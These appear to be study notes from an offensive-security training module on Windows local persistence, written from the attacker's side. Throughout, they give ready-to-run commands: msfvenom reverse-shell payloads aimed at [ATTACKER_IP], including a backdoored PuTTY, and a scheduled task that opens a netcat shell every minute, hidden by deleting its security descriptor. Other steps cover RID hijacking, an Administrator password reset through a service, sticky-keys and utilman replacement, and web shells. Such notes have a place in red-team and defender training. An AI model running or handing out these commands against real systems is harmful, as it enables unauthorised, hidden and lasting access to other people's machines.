Windows Local Persistence

Learn the most common persistence techniques used on Windows.

Introduction

Establishing persistence is the first task you have as an attacker after gaining access to a network. Persistence refers to creating alternate ways to gain access to a host without going through exploitation all over again. Some reasons why you want persistence include:

  • Re-exploitation isn't always possible : unstable exploits may kill vulnerable processes during the exploitation, only giving you one shot.

  • Getting a foothold is hard to reproduce : if you gained access using a phishing campaign, repeating it to access another host is too much work & may not be as efficient.

  • The blue team is after you : any vulnerability used to gain access might be patched if you are caught.

Assigning Group Memberships

Adding users to groups with net local group [GROUP] can allow persistence to be maintained. The following groups can be useful for persistence:

  • Administrators : adds a user to the administrators group, useful, but easily detected.

  • Backup Operators : gives a user global read/write for any file or registry key, ignoring DACL. This would allow copying of SAM and SYSTEM registry hives.

  • Remote Management Users : gives a user permissions to use winRM.

Special Privileges and Security Descriptors

Another method of persistence is to assign a user special privileges, this can be done regardless of their group memberships. The steps to assign a user permissions for SeBackup and SeRestore are:

  1. secedit /export /cfg config.inf

  2. Open config.inf and find [Privilege Rights], add the desired user at the end of the SeBackupPrivilege and SeBackupRestore lines.

  3. secedit /import /cfg config.inf /db config.sdb

  4. secedit /configure /db config.sdb /cfg config.inf

  5. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

This gives any user the equivalent permissions to "Backup Operator". The user can then be given permission to use WinRM via the security descriptor by running the following in PowerShell:

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

Then choose "Add" and add the desired user.

RID Hijacking

When users are created, they get an identifier called an RID (Relative ID) assigned. This is a numeric ID representing the user, when a user logs on, the LSASS process gets its RID from the SAM hive and then creates an access token associated with that ID. If we can tamper with the registry value, we can force Windows to assign an Administrator access token to an unprivileged user by associating the same RID with both accounts.

To find assigned RIDs, run wmic useraccount get name,sid. The end part of the SID is the user RID. All users will have an RID greater than 1,000.

To assign an RID to a user, the SAM needs to be edited in Regedit. The SAM can only be edited by SYSTEM, a tool like psexec can be used to run regedit for editing with: PsExec64.exe -i -s regedit. Once in, find the SAM at HKLM\SAM\SAM\Domains\Account\Users\. To find and modify a user, search for their ID in Hex format and then modify the "F" value under the key. The users RID is held in position 0x30, modifying this to match the admin RID will make Windows recognise that user as Admin next time they logon.

Executable Files

If you find any .exe files on a users desktop, there's a high chance they run these frequently. These can be hijacked with a payload of your preference using msfvenom. For example, the following would create a backdoored version of Putty which executes a reverse_tcp meterpreter payload silently, as well as running Putty.

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=[ATTACKER_IP] lport=3333 -b "\x00" -f exe -o puttyX.exe

Shortcut Files

Shortcut files can also be modified. Right-clicking and viewing properties for a shortcut will show where it points to, changing this to a custom script in a different location like C:\Windows\System32 would allow you to execute the usual program and trigger a reverse shell.

Hijacking File Associations

The default file system associations are stored in HKLM\Software\Classes. To see a which program opens a file check the "Data" field alongside the association, for example, .txt is associated with ProgID txtfile. You can then find and modify the command for that ProgID to force it to execute malicious code as well as open the file extension (most ProgIDs have a shell\open\command).

Backdooring Services

A service can be created and started using the following commands:

sc.exe create TestService binPath= "net user Administrator Passwd123" start= auto
sc.exe start TestService

This example will reset the Administrator password to "Passwd123". The service is also set to start automatically with "start= auto" so it starts without user interaction. Msfvenom can also beused to create a malicious service executable:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=3333 -f exe-service -o rev-svc.exe

You can then upload this to a target, and point a malicious service at it to obtain a reverse shell.

Modifying Existing Services

Modification of an existing service may be stealthier than creating an entirely new service. To search for current services, use: sc query state=all. When using a service for persistence, the three things to pay attention to are:

  1. The executable BINARY_PATH_NAME should point to our payload.

  2. The START_TYPE should be automatic, to avoid user interaction.

  3. The SERVICE_START_NAME, should preferably be LocalSystem.

Existing services can be modified with sc.exe config [SERVICE_NAME] [options].

Abusing Scheduled Tasks

An example of this would be to create a task which triggers a reverse shell every minute:

schtasks /create /sc minute /mo 1 /tn Backdoor /tr "c:\tools\nc64 -e cmd.exe [ATTACKER_IP] 3333" /ru SYSTEM

This will, however, be noticeable if the compromised user lists its scheduled tasks. To hide this, we can delete the Security Descriptor (SD) which is located in: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. To delete the SD value from registry, you would need to use a tool like psexec to enter RegEdit as system.

Startup Folder

A malicious payload can be created using msfvenom as shown before, this can then be placed in the users AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup directory. Alternatively, this can be placed in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp to trigger it for all users.

Run/RunOnce

Creating a REG_EXPAND_SZ entry under any of the following paths can force a user to run a program on logon, allowing you to gain access:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run

  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

The key value should point to your payload e.g. C:\Windows\payload.exe. HKCU will affect only current user, while HKLM will affect whole machine. Programs specified in RunOnce will only be run a single time.

Winlogon

This is the component of Windows that loads your user profile after authentication. Winlogon uses registry keys at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\, the interesting ones are:

  • Userinit: points to userinit.exe which restores your user profile preferences.

  • shell: points to the system shell, usually explorer.exe.

Replacing any of these values with a reverse shell would break the logon sequence, however, if you append a command using a comma then Winlogon will process it all e.g.:

  • C:\Windows\system32\userinit.exe, C:\Windows\myshell.exe

Logon Scripts

While loading your profile, userinit.exe also checks for an environment variable called UserInitMprLogonScript. This can be used to assign a logon script, this isn't set by default so we can create one with any value we like. To create this variable make a REG_EXPAND_SZ key under HKCU\Envrionment with the name UserInitMprLogonScript and the value pointing to your payload. There is no HKLM equivalent for this, so it must be done per user.

Sticky Keys

Pressing SHIFT 5 times is the Windows shortcut to activate sticky keys. When executed, Windows runs the binary at C:\Windows\System32\sethc.exe, if we can replace this binary with something like cmd.exe, then we can trigger it by simply pressing the shortcut. To do this, the following commands need to be executed first:

takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant [USER]:F

Once this is done, the .exe can be replaced.

Utilman

Utilman is the Windows application used to provide the "Ease of Access" options on the lock screen. Using the same technique as above in Sticky Keys, we can replace C:\Windows\System32\utilman.exe with cmd.exe to instead execute that every time the "Ease of Access" button is clicked on the lock screen.

Web Shells

Uploading a shell to the web directory will grant access with the privilege of the configured user in IIS (by default iis apppool\defaultapppool), which has the special SeImpersonatePrivilege. The easiest way to do this, is to download a web shell and place it on the machine under C:\inetpub\wwwroot\. Then you can navigate to the web server IP to access and use the shell with: http://[IP_ADDR]/shell.aspx.

Note blue teams typically check file integrity in web directories.

Last updated